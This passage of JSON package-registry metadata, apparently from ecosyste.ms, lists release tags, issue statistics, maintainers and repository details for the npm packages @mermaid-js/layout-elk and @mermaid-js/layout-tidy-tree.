},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2024-09-02T17:41:38.512Z","dependent_packages_count":0,"downloads":99152,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.91930434126771,"dependent_packages_count":37.65174639320426,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.785525367235987},"purl":"pkg:npm/%40mermaid-js/layout-elk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/layout-elk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/layout-elk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/layout-elk/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-01T11:04:12.704Z","issues_count":1476,"pull_requests_count":993,"avg_time_to_close_issue":36729669.49814815,"avg_time_to_close_pull_request":1452238.052890529,"issues_closed_count":535,"pull_requests_closed_count":811,"pull_request_authors_count":216,"issue_authors_count":811,"avg_comments_per_issue":4.596205962059621,"avg_comments_per_pull_request":3.635448136958711,"merged_pull_requests_count":701,"bot_issues_count":1,"bot_pull_requests_count":127,"past_year_issues_count":486,"past_year_pull_requests_count":603,"past_year_avg_time_to_close_issue":2107834.0657894737,"past_year_avg_time_to_close_pull_request":1142849.290388548,"past_year_issues_closed_count":151,"past_year_pull_requests_closed_count":487,"past_year_pull_request_authors_count":172,"past_year_issue_authors_count":337,"past_year_avg_comments_per_issue":1.4135802469135803,"past_year_avg_comments_per_pull_request":3.585406301824212,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":106,"past_year_merged_pull_requests_count":404,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":351,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":51,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"Yokozuna59","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"knsv","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yash-Singh1","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"GDFaber","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"NicolasNewman","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"ashishjain0512","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"},{"login":"yari-dewalt","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"}],"active_maintainers":[{"login":"sidharthv96","count":108,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"aloisklink","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"knsv","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"Yash-Singh1","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"Yokozuna59","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"NicolasNewman","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"yari-dewalt","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-elk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-elk/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-elk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Flayout-elk/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2024-08-23T14:43:45.381Z","updated_at":"2024-08-23T14:43:45.381Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2024-08-23T14:43:45.492Z","updated_at":"2024-08-23T14:43:45.492Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2024-08-23T14:43:45.575Z","updated_at":"2024-08-23T14:43:45.575Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2024-08-23T14:43:45.652Z","updated_at":"2024-08-23T14:43:45.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2024-08-23T14:43:45.266Z","updated_at":"2024-08-23T14:43:45.266Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2024-08-23T14:43:45.188Z","updated_at":"2024-08-23T14:43:45.188Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12073689,"name":"@mermaid-js/layout-tidy-tree","ecosystem":"npm","description":"Tidy-tree layout engine for mermaid","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","tidy-tree","mermaid","layout"],"namespace":"mermaid-js","versions_count":1,"first_release_published_at":"2025-09-04T15:08:06.270Z","latest_release_published_at":"2025-09-04T15:08:06.270Z","latest_release_number":"0.2.0","last_synced_at":"2025-09-04T15:10:41.128Z","created_at":"2025-09-04T15:10:40.701Z","updated_at":"2025-09-05T07:54:07.563Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/layout-tidy-tree","install_command":"npm install @mermaid-js/layout-tidy-tree","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.2.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":185,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/